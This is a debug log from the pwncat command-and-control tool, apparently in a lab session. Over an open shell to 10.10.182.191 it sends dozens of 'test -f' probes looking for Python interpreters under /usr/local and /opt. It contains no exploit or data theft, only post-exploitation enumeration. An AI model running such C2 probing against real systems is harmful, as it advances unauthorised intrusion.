2020-06-12 17:05:33,089 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,090 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.6
2020-06-12 17:05:33,090 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,090 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.6 && echo /usr/local/python3.8/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,090 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,114 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,114 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.7
2020-06-12 17:05:33,114 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,114 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.7 && echo /usr/local/python3.8/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,114 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,139 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,139 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python3.8
2020-06-12 17:05:33,140 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,140 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.8/bin/python3.8 && echo /usr/local/python3.8/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,140 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,163 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,163 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python
2020-06-12 17:05:33,164 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,164 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python && echo /opt/bin/python || echo;\n'
2020-06-12 17:05:33,164 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,196 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,196 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2
2020-06-12 17:05:33,196 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,196 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2 && echo /opt/bin/python2 || echo;\n'
2020-06-12 17:05:33,196 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,222 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,222 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python2.7
2020-06-12 17:05:33,222 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,222 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python2.7 && echo /opt/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,222 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,255 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,255 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3
2020-06-12 17:05:33,255 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,255 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3 && echo /opt/bin/python3 || echo;\n'
2020-06-12 17:05:33,255 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,282 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,283 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.5
2020-06-12 17:05:33,283 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,283 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.5 && echo /opt/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,283 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,309 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,309 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.6
2020-06-12 17:05:33,309 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,309 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.6 && echo /opt/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,309 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,334 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,334 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.7
2020-06-12 17:05:33,334 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,334 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.7 && echo /opt/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,334 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,366 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,366 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/bin/python3.8
2020-06-12 17:05:33,366 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,366 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/bin/python3.8 && echo /opt/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,366 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,389 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,390 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python
2020-06-12 17:05:33,390 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,390 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python && echo /opt/python/bin/python || echo;\n'
2020-06-12 17:05:33,390 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,414 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,414 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2
2020-06-12 17:05:33,415 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,415 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2 && echo /opt/python/bin/python2 || echo;\n'
2020-06-12 17:05:33,415 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,438 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,438 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python2.7
2020-06-12 17:05:33,439 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,439 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python2.7 && echo /opt/python/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,439 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,462 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,462 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3
2020-06-12 17:05:33,462 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,462 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3 && echo /opt/python/bin/python3 || echo;\n'
2020-06-12 17:05:33,462 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,487 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,487 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.5
2020-06-12 17:05:33,487 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,487 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.5 && echo /opt/python/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,487 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,511 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,511 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.6
2020-06-12 17:05:33,511 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,511 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.6 && echo /opt/python/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,511 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,535 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,535 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.7
2020-06-12 17:05:33,535 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,535 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.7 && echo /opt/python/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,535 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,558 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,559 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python/bin/python3.8
2020-06-12 17:05:33,559 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,559 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python/bin/python3.8 && echo /opt/python/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,559 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,583 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,584 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python
2020-06-12 17:05:33,584 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,584 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python && echo /opt/python2/bin/python || echo;\n'
2020-06-12 17:05:33,584 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,608 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,608 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2
2020-06-12 17:05:33,609 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,609 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2 && echo /opt/python2/bin/python2 || echo;\n'
2020-06-12 17:05:33,609 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,632 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,632 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python2.7
2020-06-12 17:05:33,632 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,632 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python2.7 && echo /opt/python2/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,633 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,658 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,658 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3
2020-06-12 17:05:33,658 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,658 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3 && echo /opt/python2/bin/python3 || echo;\n'
2020-06-12 17:05:33,658 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,685 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,685 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.5
2020-06-12 17:05:33,685 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,685 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.5 && echo /opt/python2/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,685 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,710 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,710 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.6
2020-06-12 17:05:33,710 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,710 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.6 && echo /opt/python2/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,710 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,734 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,734 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.7
2020-06-12 17:05:33,734 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,734 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.7 && echo /opt/python2/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,734 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,757 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,757 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2/bin/python3.8
2020-06-12 17:05:33,758 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,758 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2/bin/python3.8 && echo /opt/python2/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,758 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,782 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,782 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python
2020-06-12 17:05:33,782 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,782 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python && echo /opt/python2.7/bin/python || echo;\n'
2020-06-12 17:05:33,782 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,806 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,806 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2
2020-06-12 17:05:33,806 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,806 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2 && echo /opt/python2.7/bin/python2 || echo;\n'
2020-06-12 17:05:33,806 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,830 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,830 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python2.7
2020-06-12 17:05:33,830 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,830 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python2.7 && echo /opt/python2.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:33,830 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,854 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,854 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3
2020-06-12 17:05:33,854 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,854 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3 && echo /opt/python2.7/bin/python3 || echo;\n'
2020-06-12 17:05:33,854 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,879 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,879 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.5
2020-06-12 17:05:33,880 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,880 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.5 && echo /opt/python2.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:33,880 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,903 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,903 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.6
2020-06-12 17:05:33,903 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,903 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.6 && echo /opt/python2.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:33,903 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,929 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,929 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.7
2020-06-12 17:05:33,929 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,929 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.7 && echo /opt/python2.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:33,929 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,962 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,962 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python2.7/bin/python3.8
2020-06-12 17:05:33,962 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,962 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python2.7/bin/python3.8 && echo /opt/python2.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:33,962 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:33,985 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:33,985 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python
2020-06-12 17:05:33,985 DEBUG [MainThread] 1803:send(): Trying to send 73 bytes to 10.10.182.191:45802
2020-06-12 17:05:33,985 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python && echo /opt/python3/bin/python || echo;\n'
2020-06-12 17:05:33,986 DEBUG [MainThread] 1826:send(): Sent 73 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,017 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,017 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2
2020-06-12 17:05:34,017 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,018 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2 && echo /opt/python3/bin/python2 || echo;\n'
2020-06-12 17:05:34,018 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,049 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,050 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python2.7
2020-06-12 17:05:34,050 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,050 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python2.7 && echo /opt/python3/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,050 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,076 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,076 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3
2020-06-12 17:05:34,076 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,076 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3 && echo /opt/python3/bin/python3 || echo;\n'
2020-06-12 17:05:34,076 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,101 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,101 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.5
2020-06-12 17:05:34,101 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,101 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.5 && echo /opt/python3/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,101 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,127 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,127 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.6
2020-06-12 17:05:34,127 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,127 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.6 && echo /opt/python3/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,127 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,151 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,151 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.7
2020-06-12 17:05:34,151 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,151 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.7 && echo /opt/python3/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,152 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,175 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,175 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.8
2020-06-12 17:05:34,175 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,175 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.8 && echo /opt/python3/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,175 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,201 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,201 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python
2020-06-12 17:05:34,201 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,202 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python && echo /opt/python3.5/bin/python || echo;\n'
2020-06-12 17:05:34,202 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,235 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,235 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2
2020-06-12 17:05:34,235 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,235 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2 && echo /opt/python3.5/bin/python2 || echo;\n'
2020-06-12 17:05:34,235 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
